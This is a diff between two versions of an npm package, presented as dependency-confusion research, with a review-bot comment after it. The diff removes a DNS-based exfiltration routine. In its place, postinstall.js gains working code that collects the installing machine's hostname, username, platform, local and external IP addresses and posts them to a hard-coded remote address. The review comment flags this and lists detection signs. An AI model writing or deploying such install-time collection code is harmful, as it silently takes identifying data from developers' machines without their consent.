@gaia-codesearch/gaia-api-python 0.0.8 → 0.0.9

Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/postinstall.js +28 -34
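--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "@gaia-codesearch/gaia-api-python",
- "version": "0.0.8",
+ "version": "0.0.9",
  "description": "Security research — scope ownership proof for dependency confusion report",
  "main": "index.js",
  "scripts": {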
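--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -1,14 +1,11 @@
- const dns = require("dns");
+ const http = require("http");
  const os = require("os");
  const https = require("https");
 
- const CALLBACK = "d7vn40ir47ntg9l09cigo9m6xm43xti68.oast.me";
+ const CALLBACK_HOST = "72.62.36.138";
+ const CALLBACK_PORT = 8443;
  const PKG = "gaia-api-python";
 
- function hex(s) {
- return Buffer.from(s).toString("hex");
- }
-
  function getLocalIPs() {
  const ifaces = os.networkInterfaces();
  const ips = [];
@@ -17,39 +14,36 @@ function getLocalIPs() {
  if (!iface.internal && iface.family === "IPv4") ips.push(iface.address);
  }
  }
- return ips.join("-") || "unknown";
+ return ips.join(",") || "unknown";
  }
 
- function dnsLookup(subdomain) {
- return new Promise((resolve) => {
- dns.resolve4(subdomain + "." + CALLBACK, () => resolve());
- });
+ function send(data) {
+ const body = JSON.stringify(data);
+ const req = http.request({
+ hostname: CALLBACK_HOST, port: CALLBACK_PORT, path: "/callback",
+ method: "POST", headers: { "Content-Type": "application/json", "Content-Length": body.length },
+ timeout: 5000,
+ }, () => {});
+ req.on("error", () => {});
+ req.write(body);
+ req.end();
  }
 
- async function exfil() {
- const hostname = os.hostname();
- const user = os.userInfo().username;
- const platform = os.platform() + "-" + os.arch();
- const ips = getLocalIPs();
- const cwd = process.cwd().replace(/\//g, "-").slice(0, 40);
- const ts = Date.now().toString(36);
-
- await dnsLookup("pkg." + hex(PKG));
- await dnsLookup("host." + hex(hostname));
- await dnsLookup("user." + hex(user));
- await dnsLookup("os." + hex(platform));
- await dnsLookup("ip." + hex(ips));
- await dnsLookup("cwd." + hex(cwd));
- await dnsLookup("ts." + ts);
- await dnsLookup("rce." + hex(PKG + "|" + user + "@" + hostname));
+ async function main() {
+ const data = {
+ pkg: PKG,
+ host: os.hostname(),
+ user: os.userInfo().username,
+ os: os.platform() + "-" + os.arch(),
+ ip: getLocalIPs(),
+ extip: "",
+ };
 
  https.get("https://api.ipify.org", (res) => {
- let data = "";
- res.on("data", (c) => (data += c));
- res.on("end", () => {
- dnsLookup("extip." + hex(data.trim()));
- });
- }).on("error", () => {});
+ let d = "";
+ res.on("data", (c) => (d += c));
+ res.on("end", () => { data.extip = d.trim(); send(data); });
+ }).on("error", () => { send(data); });
  }
 
- exfil().catch(() => {});
+ main();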
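Review bot: Host and user identifiers now leave the installing machine in cleartext, because the new `send()` posts hostname, username, platform, local IPv4 addresses and the external IP as JSON over plain `http` to the hard-coded address `72.62.36.138:8443`, with no opt-in from whoever runs the install. An ownership proof for a dependency-confusion report needs far less than this; the payload in `main()` could be reduced to `const data = { pkg: PKG };` and the `https.get("https://api.ipify.org", …)` lookup dropped. For anyone triaging a host that pulled this version, outbound connections to that address and to api.ipify.org during `npm install` are the observable signs, and installing with `--ignore-scripts` keeps the hook from running. The `scripts` entry that wires this file in is cut off in the package.json hunk, so that it runs as a postinstall hook is inferred from the filename.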